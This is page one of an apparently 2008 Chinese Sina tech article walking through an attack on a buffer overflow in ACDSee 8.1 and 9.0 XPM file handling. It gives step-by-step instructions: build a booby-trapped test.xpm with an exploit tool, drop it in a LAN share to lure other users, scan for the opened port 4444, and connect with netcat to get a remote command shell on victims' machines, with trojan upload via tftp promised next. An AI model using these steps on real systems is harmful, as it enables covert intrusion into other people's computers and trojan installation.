跳转到路径导航栏
跳转到正文内容

从ACDSee的漏洞看木马入侵新思路

http://www.sina.com.cn  2008年04月24日 15:48  中关村在线

    作者:张齐

    对于ACDSee的大名,想必各位都不陌生。不过最近ACDSee所使用的ID_X.apl、IDE_ACDStd.apl、ID_PSP.ap和AM_LHA.apl插件在处理XBM/XPM/PSP/LHA文件时出现缓冲区溢出漏洞,如果用户打开了带有超长字符串的XBM/XPM/PSP/LHA文件的话,就可能触发这些溢出,导致执行任意指令。

    本次提到的漏洞影响的版本是ACDSee Photo Manager 9.0和ACDSee Photo Manager 8.1。我们下面就具体分析一下漏洞利用的全过程。

    漏洞初显

    假设在一个局域网中,终端上装有ACDSee 8.1。则这个漏洞就可以派上用场了!毕竟对于这类软件,用户更新较少,对于漏洞的利用率还是很高的。


从ACDSee的漏洞看木马入侵新思路
ACDSee Pro 8.1

    首先利用ACDSee XPM文件溢出利用工具,将其放到一个文件夹中,然后打开“记事本”,在其中输入如下的代码:acdsee.exe 1 test.xpm,然后保存为一个批处理文件1.bat,和利用工具acdsee.exe放到一个文件夹中。现在双击运行1.bat,就会在这个目录下面生成一个名字为test.xpm的文件了,这个XPM文件是默认被ACDSee程序关联打开的。

    提醒用户,使用这个bat文件是为了执行命令的方便,你也可以在cmd中进入到这个目录中,然后执行“acdsee.exe 1 test.xpm”,效果是一样的。

    我们可以先在终端上进行测试,运行XPM文件,打开ACDSee窗口后发现其处于崩溃状态。这就是溢出的结果了,下面只有在“任务管理器”里把ACDSee终结了,然后“命令提示符”窗口,在其中输入“netstat -an”命令来查看本机的端口开放情况,如果4444端口打开了,并且处于监听状态,可以说万事俱备。把这个文件发到共享区中,如果其它用户下载并开启了程序,则漏洞入侵就开始了。

从ACDSee的漏洞看木马入侵新思路
4444端口打开了,并且处于监听状态

    终端陷阱

    静待一段时间,如果幸运的话,用扫描器扫描后会发现有4444端口开启的终端(如图6),下面就该用NC来连接肉鸡以实现控制了。打开“记事本”程序,在其中输入如下的代码:nc 192.168.0.151 4444 (192.168.0.151是目标终端的IP地址,4444就是它打开的待接端口),然后保存为一个批处理文件2.bat,和nc.exe放在同一个目录里。


从ACDSee的漏洞看木马入侵新思路
端口扫描

    双击运行2.bat这个文件,看见了?我们的NC顺利的连接上了肉鸡(如图7),并且返回了一个CMDShell,现在我们在这个窗口里的操作就等同于在肉鸡上执行命令了,嘻嘻。该是上传个木马的时候了,总不能什么都在这个命令提示符里操作吧,多不方便啊。说到上传木马,黑客最常用的就是tftp上传了,但是小菜们可能还不太熟悉tftp的使用,下面我来详细操作一下。

上一页 1 2 下一页
本文导航:
·漏洞初显
·上传木马

Powered By Google ‘我的2008’,中国有我一份力!

新浪简介About Sina广告服务联系我们招聘信息网站律师SINA English会员注册产品答疑┊Copyright © 1996-2008 SINA Corporation, All Rights Reserved

新浪公司 版权所有